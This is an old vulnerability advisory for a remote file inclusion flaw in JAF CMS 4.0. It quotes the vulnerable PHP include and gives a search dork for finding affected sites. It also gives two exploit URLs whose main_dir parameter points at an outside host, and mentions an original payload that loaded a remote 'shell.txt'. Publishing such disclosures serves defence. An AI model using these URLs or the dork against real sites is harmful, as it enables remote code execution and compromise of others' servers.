JAF CMS Remote file include (website)

2006-10-05T00:00:00
ID SECURITYVULNS:DOC:14552
Type securityvulns
Reporter Securityvulns
Modified 2006-10-05T00:00:00

Description

===========================================================================================

JAF CMS Remote file include (website)

===========================================================================================

Script name : JAF CMS

Version : 4.0

===========================================================================================

Vulnerable Code :

if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}

===========================================================================================

Dork : powered by JAF CMS © 2004 - 2006

Exploit :

(1)

http://www.site.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://www.milw0rm.com/index.php?&

(2)

http://www.site.com/[jmf_path]/module/forum/headlines.php?id=1&main_dir=http://www.milw0rm.com/index.php?&

===========================================================================================

Discoverd By : ThE TiGeR

Contact : miro_tiger100[at]hotmail[dot]com

===========================================================================================

/ * modified the authors GET request from * ?website=http://www.site.com/shell.txt? * to the current. /str0ke /